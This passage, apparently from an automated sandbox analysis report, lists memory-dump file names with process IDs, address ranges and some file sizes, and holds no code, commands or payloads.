                                                                  • memory/3312-225-0x0000000000000000-mapping.dmp

                                                                  • memory/3408-168-0x0000000000000000-mapping.dmp

                                                                  • memory/3452-159-0x0000026C226C0000-0x0000026C22763000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/3472-200-0x0000000000000000-mapping.dmp

                                                                  • memory/3472-150-0x0000000000000000-mapping.dmp

                                                                  • memory/3592-216-0x0000000000000000-mapping.dmp

                                                                  • memory/3692-198-0x0000000000000000-mapping.dmp

                                                                  • memory/3696-146-0x0000000000000000-mapping.dmp

                                                                  • memory/3700-196-0x0000000000000000-mapping.dmp

                                                                  • memory/3752-160-0x000001415F550000-0x000001415F5F3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/3952-230-0x0000000000000000-mapping.dmp

                                                                  • memory/3956-191-0x0000000000000000-mapping.dmp

                                                                  • memory/4148-163-0x0000000000000000-mapping.dmp

                                                                  • memory/4252-211-0x0000000000000000-mapping.dmp

                                                                  • memory/4356-221-0x0000000000000000-mapping.dmp

                                                                  • memory/4380-162-0x0000000000000000-mapping.dmp

                                                                  • memory/4476-170-0x0000000000000000-mapping.dmp

                                                                  • memory/4476-224-0x0000000000000000-mapping.dmp

                                                                  • memory/4544-169-0x000001746F810000-0x000001746F8B3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/4732-131-0x0000000010000000-0x000000001000E000-memory.dmp

                                                                    Filesize

                                                                    56KB

                                                                  • memory/4732-136-0x0000000001470000-0x000000000147D000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/4732-130-0x0000000000000000-mapping.dmp

                                                                  • memory/4788-153-0x0000000000000000-mapping.dmp

                                                                  • memory/4852-222-0x0000000000000000-mapping.dmp

                                                                  • memory/4912-165-0x0000000000000000-mapping.dmp

                                                                  • memory/4916-167-0x00000000011E0000-0x0000000001276000-memory.dmp

                                                                    Filesize

                                                                    600KB

                                                                  • memory/4916-166-0x00000000009D6B20-0x00000000009D6B24-memory.dmp

                                                                    Filesize

                                                                    4B

                                                                  • memory/4916-164-0x0000000000000000-mapping.dmp

                                                                  • memory/4996-212-0x0000000000000000-mapping.dmp

                                                                  • memory/5056-143-0x0000000000000000-mapping.dmp

                                                                  • memory/5116-185-0x0000000000000000-mapping.dmp